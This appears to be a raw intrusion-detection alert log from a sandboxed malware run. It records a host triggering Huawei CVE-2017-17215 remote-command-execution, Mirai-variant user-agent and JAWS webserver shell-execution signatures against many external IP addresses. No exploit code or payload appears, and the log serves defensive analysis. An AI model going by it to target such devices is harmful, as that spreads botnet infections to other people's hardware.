                                                    2024-12-03T23:02:34.478990+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337306156.151.41.8437215TCP
                                                    2024-12-03T23:02:34.479127+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234702841.57.81.15737215TCP
                                                    2024-12-03T23:02:34.487677+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233768641.43.114.6937215TCP
                                                    2024-12-03T23:02:34.487911+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342138156.116.94.23437215TCP
                                                    2024-12-03T23:02:34.494228+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338580156.66.171.22237215TCP
                                                    2024-12-03T23:02:34.494327+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355624156.155.216.22437215TCP
                                                    2024-12-03T23:02:34.494471+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336530197.217.127.11537215TCP
                                                    2024-12-03T23:02:34.494750+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357502197.63.7.16837215TCP
                                                    2024-12-03T23:02:34.494751+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233902641.237.9.15937215TCP
                                                    2024-12-03T23:02:34.494797+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336198156.249.107.4237215TCP
                                                    2024-12-03T23:02:34.503413+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356278197.44.112.22337215TCP
                                                    2024-12-03T23:02:34.503612+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351536156.182.13.6237215TCP
                                                    2024-12-03T23:02:34.503754+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233865841.70.88.1437215TCP
                                                    2024-12-03T23:02:34.503843+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357202197.110.123.837215TCP
                                                    2024-12-03T23:02:34.503999+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234373241.120.63.20537215TCP
                                                    2024-12-03T23:02:34.504197+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233682841.67.56.6337215TCP
                                                    2024-12-03T23:02:34.510043+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351106197.161.143.24337215TCP
                                                    2024-12-03T23:02:34.519123+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342982197.248.78.3137215TCP
                                                    2024-12-03T23:02:34.519226+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337328197.13.235.17037215TCP
                                                    2024-12-03T23:02:34.525527+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360916156.68.236.16237215TCP
                                                    2024-12-03T23:02:34.534697+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343146197.120.181.21437215TCP
                                                    2024-12-03T23:02:34.535047+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233887241.47.14.14837215TCP
                                                    2024-12-03T23:02:34.535185+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337086197.224.161.25337215TCP
                                                    2024-12-03T23:02:34.535433+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354314156.19.29.12937215TCP
                                                    2024-12-03T23:02:34.535575+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234425441.75.81.25037215TCP
                                                    2024-12-03T23:02:34.535674+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352170156.71.181.12537215TCP
                                                    2024-12-03T23:02:34.535785+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348000197.87.149.4237215TCP
                                                    2024-12-03T23:02:34.535892+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349436156.254.180.037215TCP
                                                    2024-12-03T23:02:34.536135+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358186197.15.7.1337215TCP
                                                    2024-12-03T23:02:34.536184+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343886156.166.236.14837215TCP
                                                    2024-12-03T23:02:34.550376+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234911041.196.141.16637215TCP
                                                    2024-12-03T23:02:34.566024+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341446156.43.34.3037215TCP
                                                    2024-12-03T23:02:34.566142+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235920841.220.151.11837215TCP
                                                    2024-12-03T23:02:34.566253+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356174197.146.15.22937215TCP
                                                    2024-12-03T23:02:34.572522+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345764223.11.137.17180TCP
                                                    2024-12-03T23:02:34.572522+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345764223.11.137.17180TCP
                                                    2024-12-03T23:02:34.597296+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233436636.153.54.8180TCP
                                                    2024-12-03T23:02:34.597296+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233436636.153.54.8180TCP
                                                    2024-12-03T23:02:34.619255+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340222109.68.30.22180TCP
                                                    2024-12-03T23:02:34.619255+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340222109.68.30.22180TCP
                                                    2024-12-03T23:02:34.650697+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334826197.166.47.22037215TCP
                                                    2024-12-03T23:02:34.659817+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337602213.155.78.7080TCP
                                                    2024-12-03T23:02:34.659817+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337602213.155.78.7080TCP
                                                    2024-12-03T23:02:34.659889+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235543441.23.147.22437215TCP
                                                    2024-12-03T23:02:34.660119+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344836156.207.3.9437215TCP
                                                    2024-12-03T23:02:34.697319+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359712199.223.119.7280TCP
                                                    2024-12-03T23:02:34.697319+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359712199.223.119.7280TCP
                                                    2024-12-03T23:02:34.737894+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23454888.198.96.2880TCP
                                                    2024-12-03T23:02:34.737894+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23454888.198.96.2880TCP
                                                    2024-12-03T23:02:34.753587+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357878194.143.31.12180TCP
                                                    2024-12-03T23:02:34.753587+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357878194.143.31.12180TCP
                                                    2024-12-03T23:02:34.759780+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337404192.154.89.21780TCP
                                                    2024-12-03T23:02:34.759780+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337404192.154.89.21780TCP
                                                    2024-12-03T23:02:34.775473+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358714197.17.9.6937215TCP
                                                    2024-12-03T23:02:34.784641+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234306692.12.118.1880TCP
                                                    2024-12-03T23:02:34.784641+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234306692.12.118.1880TCP
                                                    2024-12-03T23:02:34.784709+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234342432.96.106.13680TCP
                                                    2024-12-03T23:02:34.784709+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234342432.96.106.13680TCP
                                                    2024-12-03T23:02:35.244062+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346756156.236.59.2437215TCP
                                                    2024-12-03T23:02:35.525608+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354128156.155.14.14937215TCP
                                                    2024-12-03T23:02:35.541389+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349326156.80.60.8437215TCP
                                                    2024-12-03T23:02:35.550313+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233801641.244.120.037215TCP
                                                    2024-12-03T23:02:35.566008+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235796841.170.240.3737215TCP
                                                    2024-12-03T23:02:35.581737+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340238156.51.222.10137215TCP
                                                    2024-12-03T23:02:36.447438+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235937241.127.234.2637215TCP
                                                    2024-12-03T23:02:36.463223+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352862156.240.60.22137215TCP
                                                    2024-12-03T23:02:36.463282+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234839041.182.226.17537215TCP
                                                    2024-12-03T23:02:36.463541+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351504197.83.91.2237215TCP
                                                    2024-12-03T23:02:36.463541+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350060197.171.35.8037215TCP
                                                    2024-12-03T23:02:36.494832+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344090156.45.68.4737215TCP
                                                    2024-12-03T23:02:36.494911+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356304156.214.11.17437215TCP
                                                    2024-12-03T23:02:36.495174+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350214156.51.153.7537215TCP
                                                    2024-12-03T23:02:36.495190+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353016197.129.182.13337215TCP
                                                    2024-12-03T23:02:36.495254+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359938156.25.9.25037215TCP
                                                    2024-12-03T23:02:36.495348+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233505241.78.87.11337215TCP
                                                    2024-12-03T23:02:36.495758+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355924156.126.202.19037215TCP
                                                    2024-12-03T23:02:36.495902+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233456241.220.68.20737215TCP
                                                    2024-12-03T23:02:36.495986+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345440197.22.48.4937215TCP
                                                    2024-12-03T23:02:36.496117+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343886197.239.201.137215TCP
                                                    2024-12-03T23:02:36.496194+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346956197.164.134.8537215TCP
                                                    2024-12-03T23:02:36.496350+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233354641.221.126.13937215TCP
                                                    2024-12-03T23:02:36.496422+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360694197.64.41.17037215TCP
                                                    2024-12-03T23:02:36.496521+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342566156.25.84.12437215TCP
                                                    2024-12-03T23:02:36.496603+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339072197.80.134.10437215TCP
                                                    2024-12-03T23:02:36.496695+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233929441.112.124.15237215TCP
                                                    2024-12-03T23:02:36.503532+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234272241.176.68.17737215TCP
                                                    2024-12-03T23:02:36.503659+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336940197.201.223.6537215TCP
                                                    2024-12-03T23:02:36.503806+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233706241.89.154.18037215TCP
                                                    2024-12-03T23:02:36.504008+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234841641.122.68.14937215TCP
                                                    2024-12-03T23:02:36.504136+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348210197.198.75.21737215TCP
                                                    2024-12-03T23:02:36.504318+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235059641.72.27.12937215TCP
                                                    2024-12-03T23:02:36.504469+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233910041.151.84.537215TCP
                                                    2024-12-03T23:02:36.504583+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336984197.68.238.537215TCP
                                                    2024-12-03T23:02:36.504690+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343282156.217.246.1437215TCP
                                                    2024-12-03T23:02:36.519169+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352496156.5.172.3737215TCP
                                                    2024-12-03T23:02:36.536048+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234188441.122.171.18037215TCP
                                                    2024-12-03T23:02:36.536481+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334210197.1.51.16137215TCP
                                                    2024-12-03T23:02:36.536700+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235105241.155.78.9437215TCP
                                                    2024-12-03T23:02:36.536878+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342688197.112.69.11637215TCP
                                                    2024-12-03T23:02:36.537067+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341888156.29.132.24837215TCP
                                                    2024-12-03T23:02:36.537201+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339772156.2.126.9037215TCP
                                                    2024-12-03T23:02:36.537311+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350972197.31.132.17237215TCP
                                                    2024-12-03T23:02:36.537408+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235611041.53.91.21537215TCP
                                                    2024-12-03T23:02:36.713026+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235025053.255.254.10980TCP
                                                    2024-12-03T23:02:36.713026+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235025053.255.254.10980TCP
                                                    2024-12-03T23:02:36.769162+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351242186.15.37.18180TCP
                                                    2024-12-03T23:02:36.769162+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351242186.15.37.18180TCP
                                                    2024-12-03T23:02:36.784639+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333076171.30.84.22980TCP
                                                    2024-12-03T23:02:36.784639+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333076171.30.84.22980TCP
                                                    2024-12-03T23:02:36.784869+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234732492.241.207.7680TCP
                                                    2024-12-03T23:02:36.784869+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234732492.241.207.7680TCP
                                                    2024-12-03T23:02:36.785005+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348600156.210.120.12237215TCP
                                                    2024-12-03T23:02:37.604065+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356538197.182.227.10037215TCP
                                                    2024-12-03T23:02:37.604096+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344878197.93.227.21437215TCP
                                                    2024-12-03T23:02:37.619521+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345916197.58.215.20837215TCP
                                                    2024-12-03T23:02:37.635153+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346498197.209.232.15037215TCP
                                                    2024-12-03T23:02:37.650940+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350436197.75.53.14137215TCP
                                                    2024-12-03T23:02:37.659817+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233523441.48.165.9037215TCP
                                                    2024-12-03T23:02:37.659973+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235368241.16.57.22137215TCP
                                                    2024-12-03T23:02:37.660226+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235949041.86.108.1137215TCP
                                                    2024-12-03T23:02:37.691491+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2332916156.111.178.17837215TCP
                                                    2024-12-03T23:02:37.691556+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336666197.28.127.10137215TCP
                                                    2024-12-03T23:02:37.691569+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359976197.195.182.11937215TCP
                                                    2024-12-03T23:02:37.715321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342274134.252.61.17380TCP
                                                    2024-12-03T23:02:37.715321+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342274134.252.61.17380TCP
                                                    2024-12-03T23:02:37.728895+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355588206.186.8.23480TCP
                                                    2024-12-03T23:02:37.728895+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355588206.186.8.23480TCP
                                                    2024-12-03T23:02:37.738068+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360842208.224.38.7880TCP
                                                    2024-12-03T23:02:37.738068+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360842208.224.38.7880TCP
                                                    2024-12-03T23:02:37.744298+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233931683.137.66.10180TCP
                                                    2024-12-03T23:02:37.744298+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233931683.137.66.10180TCP
                                                    2024-12-03T23:02:37.753608+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346152198.131.70.4880TCP
                                                    2024-12-03T23:02:37.753608+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346152198.131.70.4880TCP
                                                    2024-12-03T23:02:37.759977+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344760209.93.163.20680TCP
                                                    2024-12-03T23:02:37.759977+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344760209.93.163.20680TCP
                                                    2024-12-03T23:02:37.785167+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334242107.129.75.3780TCP
                                                    2024-12-03T23:02:37.785167+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334242107.129.75.3780TCP
                                                    2024-12-03T23:02:37.785244+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233642635.143.212.21580TCP
                                                    2024-12-03T23:02:37.785244+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233642635.143.212.21580TCP
                                                    2024-12-03T23:02:37.996715+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234614647.59.50.22980TCP
                                                    2024-12-03T23:02:37.996715+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234614647.59.50.22980TCP
                                                    2024-12-03T23:02:37.996748+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234549862.50.206.21780TCP
                                                    2024-12-03T23:02:37.996748+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234549862.50.206.21780TCP
                                                    2024-12-03T23:02:38.019809+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353688108.93.80.7080TCP
                                                    2024-12-03T23:02:38.019809+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353688108.93.80.7080TCP
                                                    2024-12-03T23:02:38.039566+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355890183.70.114.23980TCP
                                                    2024-12-03T23:02:38.039566+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355890183.70.114.23980TCP
                                                    2024-12-03T23:02:38.039578+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234233693.116.139.17880TCP
                                                    2024-12-03T23:02:38.039578+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234233693.116.139.17880TCP
                                                    2024-12-03T23:02:38.039731+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333172204.76.204.18080TCP
                                                    2024-12-03T23:02:38.039731+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333172204.76.204.18080TCP
                                                    2024-12-03T23:02:38.039977+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234383495.149.63.19180TCP
                                                    2024-12-03T23:02:38.039977+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234383495.149.63.19180TCP
                                                    2024-12-03T23:02:38.066085+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352426172.71.214.20580TCP
                                                    2024-12-03T23:02:38.066085+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352426172.71.214.20580TCP
                                                    2024-12-03T23:02:38.066113+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337072155.142.246.16580TCP
                                                    2024-12-03T23:02:38.066113+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337072155.142.246.16580TCP
                                                    2024-12-03T23:02:38.900884+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347016197.224.170.15037215TCP
                                                    2024-12-03T23:02:38.909842+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335442197.213.20.9437215TCP
                                                    2024-12-03T23:02:38.925763+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338416194.168.226.8980TCP
                                                    2024-12-03T23:02:38.925763+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338416194.168.226.8980TCP
                                                    2024-12-03T23:02:38.957027+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235145041.254.32.137215TCP
                                                    2024-12-03T23:02:38.963145+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348560204.156.164.16580TCP
                                                    2024-12-03T23:02:38.963145+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348560204.156.164.16580TCP
                                                    2024-12-03T23:02:38.994200+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234495252.68.103.15480TCP
                                                    2024-12-03T23:02:38.994200+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234495252.68.103.15480TCP
                                                    2024-12-03T23:02:39.038909+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340238111.96.61.2280TCP
                                                    2024-12-03T23:02:39.038909+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340238111.96.61.2280TCP
                                                    2024-12-03T23:02:39.038917+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235283859.255.82.25580TCP
                                                    2024-12-03T23:02:39.038917+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235283859.255.82.25580TCP
                                                    2024-12-03T23:02:39.039532+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235510623.135.240.3980TCP
                                                    2024-12-03T23:02:39.039532+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235510623.135.240.3980TCP
                                                    2024-12-03T23:02:39.039660+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235645046.115.240.14580TCP
                                                    2024-12-03T23:02:39.039660+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235645046.115.240.14580TCP
                                                    2024-12-03T23:02:39.050460+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350870132.101.84.21080TCP
                                                    2024-12-03T23:02:39.050460+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350870132.101.84.21080TCP
                                                    2024-12-03T23:02:39.259989+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23420401.113.249.7680TCP
                                                    2024-12-03T23:02:39.259989+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23420401.113.249.7680TCP
                                                    2024-12-03T23:02:39.275598+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234309674.177.48.20880TCP
                                                    2024-12-03T23:02:39.275598+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234309674.177.48.20880TCP
                                                    2024-12-03T23:02:39.275718+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342442132.139.194.8680TCP
                                                    2024-12-03T23:02:39.275718+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342442132.139.194.8680TCP
                                                    2024-12-03T23:02:39.300461+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235854872.43.128.1080TCP
                                                    2024-12-03T23:02:39.300461+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235854872.43.128.1080TCP
                                                    2024-12-03T23:02:39.306792+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333134179.23.54.3980TCP
                                                    2024-12-03T23:02:39.306792+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333134179.23.54.3980TCP
                                                    2024-12-03T23:02:39.322548+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357678169.180.238.20280TCP
